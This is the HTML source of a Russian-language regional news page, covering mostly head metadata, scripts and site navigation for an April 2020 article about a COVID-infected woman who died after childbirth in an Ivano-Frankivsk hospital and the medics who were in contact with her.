<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="ru-RU" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
    <title>Смерть в роддоме украинки с коронавирусом: всплыли скандальные подробности о болезни врачей</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://lugradar.net/xmlrpc.php" />
    <link rel="icon" type="image/png" href="http://lugradar.net/wp-content/uploads/2020/03/favicon.png">
<!-- This site is optimized with the Yoast SEO plugin v10.0 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://lugradar.net/2020/04/208716" />
<meta property="og:locale" content="ru_RU" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Смерть в роддоме украинки с коронавирусом: всплыли скандальные подробности о болезни врачей" />
<meta property="og:description" content="С инфицированной коронавирусом женщиной, которая умерла после родов в больнице Ивано-Франковска, контактировали медики, у которых также обнаружили COVID-19. Об этом сообщает hromadske со ссылкой на слова директора департамента здравоохранения Ивано-Франковской ОГА Владимира Чемного. Он отметил, что 37-летняя женщина попала в больницу под наблюдение гинекологов еще за месяц до родов (по данным ВОЗ, инкубационный период коронавируса &hellip;" />
<meta property="og:url" content="http://lugradar.net/2020/04/208716" />
<meta property="og:site_name" content="Луганский радар" />
<meta property="article:publisher" content="https://www.facebook.com/lugradar/" />
<meta property="article:section" content="Общество" />
<meta property="article:published_time" content="2020-04-01T19:57:27+03:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="С инфицированной коронавирусом женщиной, которая умерла после родов в больнице Ивано-Франковска, контактировали медики, у которых также обнаружили COVID-19. Об этом сообщает hromadske со ссылкой на слова директора департамента здравоохранения Ивано-Франковской ОГА Владимира Чемного. Он отметил, что 37-летняя женщина попала в больницу под наблюдение гинекологов еще за месяц до родов (по данным ВОЗ, инкубационный период коронавируса [&hellip;]" />
<meta name="twitter:title" content="Смерть в роддоме украинки с коронавирусом: всплыли скандальные подробности о болезни врачей" />
<meta name="twitter:site" content="@lradar_official" />
<meta name="twitter:creator" content="@lradar_official" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Луганский радар &raquo; Лента" href="http://lugradar.net/feed" />
<link rel="alternate" type="application/rss+xml" title="Луганский радар &raquo; Лента комментариев" href="http://lugradar.net/comments/feed" />
<link rel="alternate" type="application/rss+xml" title="Луганский радар &raquo; Лента комментариев к &laquo;Смерть в роддоме украинки с коронавирусом: всплыли скандальные подробности о болезни врачей&raquo;" href="http://lugradar.net/2020/04/208716/feed" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/lugradar.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=2e2302cf56c0f42f1e414c5294cfde3c"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://lugradar.net/wp-includes/css/dist/block-library/style.min.css?ver=2e2302cf56c0f42f1e414c5294cfde3c' type='text/css' media='all' />
<link rel='stylesheet' id='nycreatis_style-css'  href='http://lugradar.net/wp-content/plugins/covid19-plugin-wp/assets/style.css?ver=2.1.0' type='text/css' media='all' />
<link rel='stylesheet' id='wp_automatic_gallery_style-css'  href='http://lugradar.net/wp-content/plugins/wp-automatic/css/wp-automatic.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='td-plugin-multi-purpose-css'  href='http://lugradar.net/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=ce02edff9ef904abd63ba7c9020dbb40' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css'  href='http://fonts.googleapis.com/css?family=Rubik%3A400%7CLora%3A400%7CRoboto%3A400%2C500%2C700%7COpen+Sans%3A400%2C600%2C700&#038;display=swap&#038;ver=10.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://lugradar.net/wp-content/themes/Newspaper/style.css?ver=10.3.1' type='text/css' media='all' />
<style id='td-theme-inline-css' type='text/css'>
    
        @media (max-width: 767px) {
            .td-header-desktop-wrap {
                display: none;
            }
        }
        @media (min-width: 767px) {
            .td-header-mobile-wrap {
                display: none;
            }
        }
    
	
</style>
<link rel='stylesheet' id='td-legacy-framework-front-style-css'  href='http://lugradar.net/wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=ce02edff9ef904abd63ba7c9020dbb40' type='text/css' media='all' />
<link rel='stylesheet' id='td-standard-pack-framework-front-style-css'  href='http://lugradar.net/wp-content/plugins/td-standard-pack/Newspaper/assets/css/td_standard_pack_main.css?ver=33732733d5ee7fb19a9ddd0e8b73e9d4' type='text/css' media='all' />
<link rel='stylesheet' id='tdb_front_style-css'  href='http://lugradar.net/wp-content/plugins/td-cloud-library/assets/css/tdb_less_front.css?ver=8a1d9913b13d9ab2baf63a2b29cd9fc1' type='text/css' media='all' />
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/wp-automatic/js/main-front.js?ver=2e2302cf56c0f42f1e414c5294cfde3c'></script>
<link rel='https://api.w.org/' href='http://lugradar.net/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://lugradar.net/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://lugradar.net/wp-includes/wlwmanifest.xml" /> 

<link rel='shortlink' href='http://lugradar.net/?p=208716' />
<link rel="alternate" type="application/json+oembed" href="http://lugradar.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Flugradar.net%2F2020%2F04%2F208716" />
<link rel="alternate" type="text/xml+oembed" href="http://lugradar.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Flugradar.net%2F2020%2F04%2F208716&#038;format=xml" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//lugradar.net/?wordfence_lh=1&hid=F32ACCEA20664285B7155BC17B4CCF79');
</script><!--[if lt IE 9]><script src="http://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
        <script>
        window.tdb_globals = {"wpRestNonce":"d8dba006e0","wpRestUrl":"http:\/\/lugradar.net\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%post_id%","isAjax":false,"isAdminBarShowing":false,"autoloadScrollPercent":50,"postAutoloadStatus":"off","origPostEditUrl":null};
    </script>
    			<script>
				window.tdwGlobal = {"adminUrl":"http:\/\/lugradar.net\/wp-admin\/","wpRestNonce":"d8dba006e0","wpRestUrl":"http:\/\/lugradar.net\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%post_id%"};
			</script>
			
<!-- JS generated by theme -->

<script>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</script>


<!-- Header style compiled by theme -->

<style>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</style>


<!-- Button style compiled by theme -->

<style>
    .tdm_block_column_content:hover .tdm-col-content-title-url .tdm-title,
                .tds-button2 .tdm-btn-text,
                .tds-button2 i,
                .tds-button5:hover .tdm-btn-text,
                .tds-button5:hover i,
                .tds-button6 .tdm-btn-text,
                .tds-button6 i,
                .tdm_block_list .tdm-list-item i,
                .tdm_block_pricing .tdm-pricing-feature i,
                .tdm-social-item i {
                    color: #44749d;
                }
                .tds-button1,
                .tds-button6:after,
                .tds-title2 .tdm-title-line:after,
                .tds-title3 .tdm-title-line:after,
                .tdm_block_pricing.tdm-pricing-featured:before,
                .tdm_block_pricing.tds_pricing2_block.tdm-pricing-featured .tdm-pricing-header,
                .tds-progress-bar1 .tdm-progress-bar:after,
                .tds-progress-bar2 .tdm-progress-bar:after,
                .tds-social3 .tdm-social-item {
                    background-color: #44749d;
                }
                .tds-button2:before,
                .tds-button6:before,
                .tds-progress-bar3 .tdm-progress-bar:after {
                  border-color: #44749d;
                }
                .tdm-btn-style1 {
					background-color: #44749d;
				}
				.tdm-btn-style2:before {
				    border-color: #44749d;
				}
				.tdm-btn-style2 {
				    color: #44749d;
				}
				.tdm-btn-style3 {
				    -webkit-box-shadow: 0 2px 16px #44749d;
                    -moz-box-shadow: 0 2px 16px #44749d;
                    box-shadow: 0 2px 16px #44749d;
				}
				.tdm-btn-style3:hover {
				    -webkit-box-shadow: 0 4px 26px #44749d;
                    -moz-box-shadow: 0 4px 26px #44749d;
                    box-shadow: 0 4px 26px #44749d;
				}
</style>

	<style id="tdw-css-placeholder"></style></head>

<body class="post-template-default single single-post postid-208716 single-format-standard td-standard-pack ----- global-block-template-5 single_template_1 td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-osnova-container"><ul id="menu-osnova" class="td-mobile-main-menu"><li id="menu-item-22104" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-22104"><a href="http://lugradar.net/">Главная</a></li>
<li id="menu-item-28" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28"><a href="http://lugradar.net/region/politika">Политика</a></li>
<li id="menu-item-27" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27"><a href="http://lugradar.net/region/obchestvo">Общество</a></li>
<li id="menu-item-31" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-31"><a href="http://lugradar.net/region/ekonomika">Экономика</a></li>
<li id="menu-item-29" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-29"><a href="http://lugradar.net/region/proishestviya">Происшествия</a></li>
<li id="menu-item-82118" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-82118"><a href="http://lugradar.net/category/%d0%b2%d0%b8%d0%b4%d0%b5%d0%be">Видео</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
            <div id="login-form-mobile" class="td-register-section">
            
            <div id="td-login-mob" class="td-login-animation td-login-hide-mob">
            	<!-- close button -->
	            <div class="td-login-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Sign in</div>
	                <!-- close button -->
		            <div class="td-mobile-close">
		                <a href="#"><i class="td-icon-close-mobile"></i></a>
		            </div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title"><span>Welcome!</span>Log into your account</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email-mob" value="" required><label>Ваше имя пользователя</label></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass-mob" value="" required><label>Ваш пароль</label></div>
	                <input type="button" name="login_button" id="login_button-mob" class="td-login-button" value="ВОЙТИ">
	                <div class="td-login-info-text">
	                <a href="#" id="forgot-pass-link-mob">Вы забыли свой пароль?</a>
	                </div>
	                <div class="td-login-register-link">
	                
	                </div>
	                
	                

                </div>
            </div>

            
            
            
            
            <div id="td-forgot-pass-mob" class="td-login-animation td-login-hide-mob">
                <!-- close button -->
	            <div class="td-forgot-pass-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Password recovery</div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title">Восстановите свой пароль</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email-mob" value="" required><label>Ваш адрес электронной почты</label></div>
	                <input type="button" name="forgot_button" id="forgot_button-mob" class="td-login-button" value="Отправить Мой Пароль">
                </div>
            </div>
        </div>
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search">
		<form method="get" class="td-search-form" action="http://lugradar.net/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Поиск</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob" class="td-ajax-search-flex"></div>
	</div>
</div>

    <div id="td-outer-wrap" class="td-theme-wrap">
    
        
            <div class="tdc-header-wrap ">

            <!--
Header style 1
-->


<div class="td-header-wrap td-header-style-1 ">
    
    <div class="td-header-top-menu-full td-container-wrap td_stretch_content">
        <div class="td-container td-header-row td-header-top-menu">
            <!-- LOGIN MODAL -->

                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <div class="td-login-wrap">
                        <a href="#" class="td-back-button"><i class="td-icon-modal-back"></i></a>
                        <div id="td-login-div" class="td-login-form-div td-display-block">
                            <div class="td-login-panel-title">Sign in</div>
                            <div class="td-login-panel-descr">Добро пожаловать! Войдите в свою учётную запись</div>
                            <div class="td_display_err"></div>
                            <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email" value="" required><label>Ваше имя пользователя</label></div>
	                        <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" required><label>Ваш пароль</label></div>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Login">
                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password? Get help</a></div>
                            
                            
                            
                            
                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-login-form-div td-display-none">
                            <div class="td-login-panel-title">Password recovery</div>
                            <div class="td-login-panel-descr">Восстановите свой пароль</div>
                            <div class="td_display_err"></div>
                            <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required><label>Ваш адрес электронной почты</label></div>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Password">
                            <div class="td-login-info-text">Пароль будет выслан Вам по электронной почте.</div>
                        </div>
                        
                        
                    </div>
                </div>
                        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full td-container-wrap td_stretch_content">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                        <a class="td-main-logo" href="http://lugradar.net/">
            <img class="td-retina-data" data-retina="http://lugradar.net/wp-content/uploads/2020/03/3.png" src="http://lugradar.net/wp-content/uploads/2020/03/3.png" alt=""/>
            <span class="td-visual-hidden">Луганский радар</span>
        </a>
                </div>
                            <div class="td-header-sp-recs">
                    <div class="td-header-rec-wrap">
    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header tdi_1_55f td_block_template_5 ">

<style>
/* custom css */
.tdi_1_55f.td-a-rec-img{
				    text-align: left;
				}.tdi_1_55f.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }
</style><script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:320px;height:50px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


</div>                </div>
                    </div>
    </div>

    <div class="td-header-menu-wrap-full td-container-wrap td_stretch_content">
        
        <div class="td-header-menu-wrap td-header-gradient ">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
                <a class="td-main-logo" href="http://lugradar.net/">
            <img class="td-retina-data" data-retina="http://lugradar.net/wp-content/uploads/2020/03/3.png" src="http://lugradar.net/wp-content/uploads/2020/03/3.png" alt=""/>
        </a>
        </div>
    <div class="menu-osnova-container"><ul id="menu-osnova-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-22104"><a href="http://lugradar.net/">Главная</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-28"><a href="http://lugradar.net/region/politika">Политика</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-27"><a href="http://lugradar.net/region/obchestvo">Общество</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-31"><a href="http://lugradar.net/region/ekonomika">Экономика</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-29"><a href="http://lugradar.net/region/proishestviya">Происшествия</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-82118"><a href="http://lugradar.net/category/%d0%b2%d0%b8%d0%b4%d0%b5%d0%be">Видео</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu tdi_2_040 td-no-subcats td_with_ajax_pagination td-pb-border-top td_block_template_5"  data-td-block-uid="tdi_2_040" ><script>var block_tdi_2_040 = new tdBlock();
block_tdi_2_040.id = "tdi_2_040";
block_tdi_2_040.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"10086","show_child_cat":30,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","block_template_id":"","header_color":"","ajax_pagination_infinite_stop":"","offset":"","td_filter_default_txt":"","td_ajax_filter_ids":"","el_class":"","color_preset":"","border_top":"","css":"","tdc_css":"","class":"tdi_2_040","tdc_css_class":"tdi_2_040","tdc_css_class_style":"tdi_2_040_rand_style"}';
block_tdi_2_040.td_column_number = "3";
block_tdi_2_040.block_type = "td_block_mega_menu";
block_tdi_2_040.post_count = "5";
block_tdi_2_040.found_posts = "292";
block_tdi_2_040.header_color = "";
block_tdi_2_040.ajax_pagination_infinite_stop = "";
block_tdi_2_040.max_num_pages = "59";
tdBlocksArray.push(block_tdi_2_040);
</script><div id=tdi_2_040 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/12/202373" rel="bookmark" class="td-image-wrap" title="Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/12/maxresdefault-1-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/12/202373" rel="bookmark" title="Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе">Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/09/199504" rel="bookmark" class="td-image-wrap" title="Ремонт моста в Станице Луганской можно увидеть ONLINE"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Ремонт моста в Станице Луганской можно увидеть ONLINE" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/09/maxresdefault-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/09/199504" rel="bookmark" title="Ремонт моста в Станице Луганской можно увидеть ONLINE">Ремонт моста в Станице Луганской можно увидеть ONLINE</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/05/196041" rel="bookmark" class="td-image-wrap" title="Зеленский побывал на передовых позициях на Донбассе"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC"alt="" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/plugins/td-composer/legacy/Newspaper/assets/images/no-thumb/td_218x150.png"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/05/196041" rel="bookmark" title="Зеленский побывал на передовых позициях на Донбассе">Зеленский побывал на передовых позициях на Донбассе</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/05/195381" rel="bookmark" class="td-image-wrap" title="Как сейчас выглядит железнодорожный вокзал в Луганске"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Как сейчас выглядит железнодорожный вокзал в Луганске" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/05/sddefault-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/05/195381" rel="bookmark" title="Как сейчас выглядит железнодорожный вокзал в Луганске">Как сейчас выглядит железнодорожный вокзал в Луганске</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/03/193878" rel="bookmark" class="td-image-wrap" title="Появилось видео с места взрыва в оккупированном Луганске"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Появилось видео с места взрыва в оккупированном Луганске" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/03/maxresdefault-2-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/03/193878" rel="bookmark" title="Появилось видео с места взрыва в оккупированном Луганске">Появилось видео с места взрыва в оккупированном Луганске</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-tdi_2_040" data-td_block_id="tdi_2_040"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-tdi_2_040" data-td_block_id="tdi_2_040"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
</ul></div></div>


    <div class="header-search-wrap">
        <div class="td-search-btns-wrap">
            <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            <a id="td-header-search-button-mob" href="#" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
        </div>

        <div class="td-drop-down-search" aria-labelledby="td-header-search-button">
            <form method="get" class="td-search-form" action="http://lugradar.net/">
                <div role="search" class="td-head-form-search-wrap">
                    <input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Поиск" />
                </div>
            </form>
